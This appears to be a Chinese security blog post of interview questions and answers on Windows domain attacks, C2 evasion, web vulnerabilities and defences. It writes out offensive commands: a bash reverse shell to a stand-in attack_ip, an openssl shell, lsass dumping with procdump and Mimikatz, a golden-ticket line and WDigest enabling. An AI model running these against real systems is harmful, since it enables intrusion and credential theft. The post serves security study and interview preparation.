安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
[631. Cobalt Strike上线方式及绕过监控](#631. Cobalt Strike上线方式及绕过监控)
[632. WMIC有回显命令执行](#632. WMIC有回显命令执行)
[633. Windows安全日志分析](#633. Windows安全日志分析)
[634. Golden Ticket vs Silver Ticket](#634. Golden Ticket vs Silver Ticket)
[635. Silver Ticket利用前置条件](#635. Silver Ticket利用前置条件)
[636. 非域主机发现域主机](#636. 非域主机发现域主机)
[637. Mimikatz原理与防御绕过](#637. Mimikatz原理与防御绕过)
[638. 不重启启用Wdigest](#638. 不重启启用Wdigest)
[639. NTLM Relay攻击场景与限制](#639. NTLM Relay攻击场景与限制)
[640. Windows身份鉴别与SID攻击](#640. Windows身份鉴别与SID攻击)
[SID History攻击:](#SID History攻击:)
[641. 无域账户的域渗透路径](#641. 无域账户的域渗透路径)
[642. 默认域用户登录策略](#642. 默认域用户登录策略)
[643. 查询域管登录记录](#643. 查询域管登录记录)
[644. RSA加解密流程](#644. RSA加解密流程)
[645. HTTPS实现原理](#645. HTTPS实现原理)
[646. DNS劫持防护](#646. DNS劫持防护)
[647. 羊毛党防御策略](#647. 羊毛党防御策略)
[648. 0day应急响应](#648. 0day应急响应)
[649. CTF攻防赛技巧](#649. CTF攻防赛技巧)
[650. 端口查看命令](#650. 端口查看命令)
[651. Linux安全运维](#651. Linux安全运维)
[652. 清除日志](#652. 清除日志)
[653. 常用反弹Shell](#653. 常用反弹Shell)
[654. 渗透测试流程](#654. 渗透测试流程)
[655. 常用扫描器](#655. 常用扫描器)
[656. SQL注入](#656. SQL注入)
[657. XSS防护](#657. XSS防护)
[658. CSRF防护](#658. CSRF防护)
[659. SSRF深入利用](#659. SSRF深入利用)
[660. 羊毛党防御(猫池)](#660. 羊毛党防御(猫池))
631 cobalt strike中上线方式有哪些,各自是什么原理,如果需要绕过监控,如何绕? 632 横向渗透中,wmic如何构造有回显的命令执行? 633 windows应急响应中,需要查看哪些安全日志ID,分别对应哪些攻防场景,如果该windows主机为域控,又应该查看哪些事件日志? 634 golden ticket和sliver ticket的区别是什么? 635 sliver ticket利用的前置条件是什么? 636 在非域主机的情况下,如何快速发现域主机? 637 mimikatz的原理,哪个补丁导致了mimikatz无法利用,如何绕过? 638 有没有办法在不重启机器的前提下启用wdigest这个SSPI? 639 NTLM relay的攻击场景有哪些,使用NTLM relay会受到哪些限制? 640 windows中如何鉴别用户身份? SID是什么? 基于SID的SID History攻击原理是什么? 641 假设拿到了某台域机器的权限,但是机器上并没有域账户,应该如何进行域渗透? 642 域的初始化配置允许任何域用户登录任意加了域的机器,这是为什么? 643 如何查询域管登录过的机器,查询原理又是什么? 644 RSA加解密流程 645 HTTPS是如何实现的 646 如何防护运营商的DNS劫持/链路劫持 647 如何防范羊毛党? 648 一个大范围影响的0day被曝光,作为甲方安全工程师,应该如何处理 649 简述 CTF 攻防赛的流程和一些技巧 650 查看当前端口连接的命令有哪些?`netstat` 和 `ss` 命令的区别和优缺点; 651 Linux 服务器的安全运维操作有哪些?如何保护 SSH? 652 入侵 Linux 服务器后需要清除哪些日志? 653 一般常反弹哪一种 shell? 654 介绍渗透测试的流程; 655 简要介绍自己常用的扫描器和其实现上的特点; 656 介绍 SQL 注入漏洞成因,如何防范?注入方式有哪些?除了数据库数据,利用方式还有哪些? 657 如何防范 XSS 漏洞,在前端如何做,在后端如何做,哪里更好,为什么? 658 介绍 CSRF 漏洞和常用的防护手段; 659 介绍 SSRF 漏洞,如何深入利用?如何探测非 HTTP 协议?如何防范? 660 如何防范羊毛党(有猫池)?631. Cobalt Strike上线方式及绕过监控
上线方式与原理:
- HTTP/HTTPS Beacon
- 原理:通过HTTP/HTTPS协议与Team Server通信,GET请求接收任务,POST请求回传数据
- 绕过:使用Domain Fronting(域前置)技术隐藏C2流量,或Malleable C2配置文件伪装成合法流量(如Cloudflare)
- DNS Beacon
- 原理:通过DNS查询传递指令(TXT/AAAA记录),响应包含加密任务
- 绕过:利用合法域名托管C2(如Azure DNS),配合DNSC2 Profile降低查询频率
- SMB Beacon
- 原理:通过命名管道在内部网络通信,适合无外网出口的主机
- 绕过:禁用445端口出站监控,使用NetBIOS over TCP/IP协议
- TCP Beacon
- 原理:直接TCP连接Team Server
- 绕过:绑定到合法服务端口(如443模拟HTTPS),配合SSL证书加密
通用绕过技巧:
- 流量混淆:使用C2代理框架(如CobaltStrikeAggressor)实现流量多层加密
- 进程注入:注入到explorer.exe等白名单进程规避检测
- 睡眠混淆:设置Jitter和睡眠时间避开行为分析
632. WMIC有回显命令执行
Cmd
wmic /node:"目标IP" /user:"DOMAIN\User" /password:"Pass" process call create "cmd.exe /c whoami > C:\result.txt && type C:\result.txt"原理:
- 通过WMIC远程创建进程执行命令
- 输出重定向到文件后读取回显
- 绕过监控:拆分敏感字符串(如
"cmd" + ".exe")或使用环境变量存储命令
633. Windows安全日志分析
通用安全日志ID:
事件ID 攻防场景 关键字段 4688 进程创建(执行命令) CommandLine、ParentProcess 4624 成功登录 LogonType(3=网络登录,10=远程交互) 4625 登录失败 FailureReason(如密码错误) 4672 特权分配 监控管理员权限变化 7045 服务安装 ServiceName、ImagePath 域控额外监控:
- 4768:Kerberos TGT请求(检测Golden Ticket)
- 5136:Active Directory对象修改(ACL篡改)
- 4742:计算机账户密码重置(防御Skeleton Key)
634. Golden Ticket vs Silver Ticket
特性 Golden Ticket Silver Ticket 伪造对象 TGT(票据授予票据) ST(服务票据) 所需凭证 krbtgt账户NTLM Hash 目标服务账户NTLM Hash 作用范围 全域所有服务 单个服务(如CIFS/SQL) 检测难度 高(域控日志4768) 低(服务端日志) 有效期 最长10年(默认) 默认600分钟
635. Silver Ticket利用前置条件
- 服务账户Hash:获取目标SPN(如MSSQLsvc)的NTLM Hash
- 域信息 :域名、域SID(可通过
whoami /user获取)- 目标信息:服务名称、主机名、端口
- 客户端配置:时间需与域控同步(误差≤5分钟)
636. 非域主机发现域主机
DNS探测 :
Bash
nslookup -type=SRV _ldap._tcp.dc._msdcs.DOMAIN.COM端口扫描:扫描389(LDAP)/88(Kerberos)/53(DNS)端口
网络广播 :
Cmd
net view /domain && net group "Domain Controllers" /domain协议嗅探:监听LLMNR/NBNS响应(工具:Responder)
637. Mimikatz原理与防御绕过
原理:
- 从
lsass.exe内存提取明文密码/NTLM Hash/Kerberos票据- 利用SSPI接口(如wdigest)读取凭据缓存
阻断补丁:
- KB2871997:禁用本地管理员明文凭据缓存
- LSA保护(PPL):阻止非信任进程读取lsass内存
绕过方法:
Procdump+离线提取 :
Bash
procdump -ma lsass.exe lsass.dmp mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords"Skeleton Key注入:内存中植入万能密码
注册表修改:启用Wdigest(需管理员权限)
638. 不重启启用Wdigest
Powershell
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v "UseLogonCredential" /t REG_DWORD /d 1 /f # 强制刷新凭证(需新登录) Invoke-Command -ScriptBlock { klist purge }生效条件:新用户登录后凭据将被缓存
639. NTLM Relay攻击场景与限制
攻击场景:
- 内网协议中继:SMB→LDAP(创建高权限账户)
- Exchange攻击:中继到EWS接口接管邮箱
- AD CS攻击:中继到证书服务获取域管证书
限制条件:
限制类型 解决方案 SMB签名 目标服务未启用签名(默认域控启用) 协议降级 禁用NTLMv1(EnableLmCompatibilityLevel=5) 同一源 多网卡绑定规避 认证重复 打印机漏洞(CVE-2021-1675)
640. Windows身份鉴别与SID攻击
身份鉴别:
- SID(安全标识符) :唯一标识用户/组的字符串(如
S-1-5-21-...-500)- 访问令牌:包含用户SID、组SID及权限列表
SID History攻击:
获取域管SID(如
S-1-5-21-<DOMAIN>-512)将域管SID添加到普通账户的
SID History属性:
Powershell
mimikatz.exe "kerberos::golden /user:fakeadmin /sid:<DomainSID> /sids:<DomainAdminSID> /ptt"
641. 无域账户的域渗透路径
- 本地提权:利用内核漏洞(如PrintNightmare)
- 凭证窃取 :
- 内存提取(Mimikatz)
- DPAPI解密(vaultcmd /listcreds)
- 服务账户滥用 :
查找域账户运行的服务:
Powershell
Get-WmiObject Win32_Service | Where-Object {$_.StartName -like "*@DOMAIN*"}- Kerberoasting:请求SPN票据离线爆破
642. 默认域用户登录策略
- 原因 :默认组策略授予
Domain Users组允许本地登录权限- 风险:低权限用户可在所有域机器执行代码
- 加固 :GPO限制
Allow log on locally权限
643. 查询域管登录记录
Powershell
# PowerShell命令 Get-WinEvent -LogName Security -FilterXPath 'Event[System[EventID=4624]] and Event[EventData[Data[@Name="TargetUserSid"]="S-1-5-21-DOMAIN-500"]]' -ComputerName "目标主机"原理:检索目标主机安全日志中的4624事件,匹配域管SID
644. RSA加解密流程
- 密钥生成 :
- 选大素数
p和q,计算n=p*q- 计算欧拉函数
φ(n)=(p-1)*(q-1)- 选
e满足1<e<φ(n)且gcd(e,φ(n))=1- 计算
d满足d*e ≡ 1 mod φ(n)- 公钥
(e,n),私钥(d,n)- 加密 :密文
c = m^e mod n- 解密 :明文
m = c^d mod n
645. HTTPS实现原理
Mermaid
sequenceDiagram participant Client participant Server Client->>Server: ClientHello (TLS版本+加密套件) Server->>Client: ServerHello (选定套件) + 证书 Client->>Client: 验证证书有效性 Client->>Server: PreMasterSecret (用证书公钥加密) Server->>Server: 用私钥解密 Note over Client,Server: 协商会话密钥 Client->>Server: 加密HTTP流量 (AES-GCM等)
646. DNS劫持防护
- 协议层 :
- 使用DoH(DNS over HTTPS)或DoT(DNS over TLS)
- 部署DNSSEC验证响应签名
- 应用层 :
- 全站HTTPS+HSTS强制加密
- 前端资源SRI校验(
<script integrity>)- 监控手段 :
- 多地DNS解析比对(如Cloudflare Radar)
- TLS证书透明度监控(Certificate Transparency)
647. 羊毛党防御策略
- 行为风控 :
- 设备指纹(IDFA/IMEI/硬件指纹)
- 生物行为分析(鼠标轨迹/点击热力图)
- 资源隔离 :
- 活动库存独立部署
- 动态库存分配(延迟发放)
- 智能对抗 :
- 机器学习识别批量操作(IP聚类/时序分析)
- 验证码升级(空间推理/行为验证码)
648. 0day应急响应
- 情报确认 :
- 验证PoC真实性
- 评估影响范围(资产扫描)
- 临时防御 :
- WAF注入规则(如Lua脚本)
- 网络隔离关键系统
- 漏洞修复 :
- 测试并部署补丁
- 缓解措施(如禁用服务)
- 溯源监控 :
- 部署诱饵系统
- 日志回溯攻击路径
649. CTF攻防赛技巧
流程:
Mermaid
graph LR A[备战] --> B[加固] B --> C[部署监控] C --> D[攻击] D --> E[修复]技巧:
- 防守:自动化脚本监控Flag提交接口
- 进攻:快速打全场(1day漏洞批量利用)
- 协作:分工扫描、渗透、加固
650. 端口查看命令
命令 优点 缺点 netstat 兼容性好 速度慢(遍历/proc) ss 速度快(直接读取内核) 旧系统未预装 lsof 显示进程与文件关联 语法复杂
Bash
ss -tunap # 推荐:TCP/UDP+数字格式+进程信息
651. Linux安全运维
(同607题答案)
652. 清除日志
(同608题答案)
653. 常用反弹Shell
Bash反向Shell(最常用):
Bash
bash -i >& /dev/tcp/attack_ip/port 0>&1加密Shell:
Bash
openssl s_client -quiet -connect attack_ip:port | sh
654. 渗透测试流程
Mermaid
graph TB A[信息收集] --> B[漏洞扫描] B --> C[漏洞利用] C --> D[权限提升] D --> E[横向移动] E --> F[报告撰写]
655. 常用扫描器
工具 特点 Nmap 自定义脚本(NSE)扩展 Masscan 异步无状态扫描 Nessus 插件化架构 Burp Suite 拦截代理+主动/被动扫描
656. SQL注入
成因:用户输入拼接SQL语句
注入方式:
- 联合查询(
UNION SELECT)- 布尔盲注
- 报错注入
- 堆叠查询(
;)利用扩展:
- 读文件(
LOAD_FILE())- 写WebShell(
INTO OUTFILE)- SSRF(利用数据库发起请求)
防范:
- 预编译语句
- 最小权限原则
- WAF规则过滤
657. XSS防护
防护层 措施 有效性 前端 HTML实体编码 可绕过 后端 CSP策略( Content-Security-Policy)首选方案 框架 自动转义(如React) 依赖实现
658. CSRF防护
漏洞原理:诱使用户提交恶意请求
防护:
- 同源检测(
Origin头校验)- CSRF Token验证
- 双重Cookie提交
659. SSRF深入利用
利用链:
- 内网探测(
file:///etc/passwd)- 云元数据(
169.254.169.254)- 非HTTP协议(
gopher://攻击Redis)非HTTP探测:
- DNS重绑定绕过黑名单
- 响应时间差异判断端口开放
防护:
- 目标地址白名单
- 禁用重定向
660. 羊毛党防御(猫池)
- 设备级风控 :
- 设备指纹关联
- 模拟器检测(
ro.build.tags=test-keys)- 号码池对抗 :
- 虚拟号段拦截(170/171加强验证)
- 短信限频(IP/设备/手机号多维限制)
- 行为建模 :
- 点击热力图分析
- 网络延迟波动检测